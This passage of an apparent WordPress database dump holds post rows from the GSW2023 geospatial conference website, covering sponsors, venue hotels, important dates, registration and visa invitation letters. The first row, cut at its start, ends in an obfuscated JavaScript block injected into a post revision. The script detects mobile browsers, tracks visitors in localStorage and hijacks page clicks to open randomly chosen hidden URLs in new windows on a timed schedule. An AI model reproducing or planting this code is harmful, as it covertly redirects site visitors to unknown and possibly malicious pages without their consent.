)|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-09 22:34:55','2023-06-09 22:34:55','',3066,'https://gsw2023.com/?p=4677',0,'revision','',0),
(4678,1,'2023-06-13 20:50:11','2023-06-13 20:50:11','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609158984{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609109195{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969898333{margin-top: 5px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"341\" height=\"141\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969841504{margin-top: 20px !important;}\"]<a href=\"www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"> </a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"3/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1686350035719{margin-top: 190px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#686868\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1684379817578{margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper submission (Annals): April 30, 2023 </strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper Author notification: June 15, 2023</strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Abstract submission (Archives): May 15, 2023</strong></li>\n</ul>\n<p><strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: June 15, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1685735404108{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 12pt;\"><strong>Travel Grants by the ISPRS Foundation for GSW’2023, 2-7 September 2023 </strong></span></h5>\n<ul>\n<li style=\"text-align: left;\">Deadline for submission of travel grant applications : June 16, 2023</li>\n<li style=\"text-align: left;\">Decision and notification of successful applicants : July 15, 2023</li>\n<li style=\"text-align: left;\">Notification of acceptance of travel grant to Operations Officer : July 30, 2023</li>\n</ul>\n<p>[/vc_column_text][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686317472179{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686320769324{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][vc_column width=\"1/2\"][vc_column_text]</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong>Invitation letter</strong></span></h2>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong>You will receive an invitation letter automatically once you provide your Name (as it appears in your passport), PassportNumber ,Nationality and Your Organization .</strong></span></p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong>If you require specific format for the Visa Letter, please Send email to </strong></span></p>\n<p style=\"text-align: center;\"><strong style=\"color: #ffffff;\"><span style=\"color: #ffff00;\"> <a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\">GSW-visa@gsw2023.com</a></span> to edit/add the text of the letter.</strong></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fvisa.gsw2023.com%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686318545126{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Get Your Invitation letter[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime 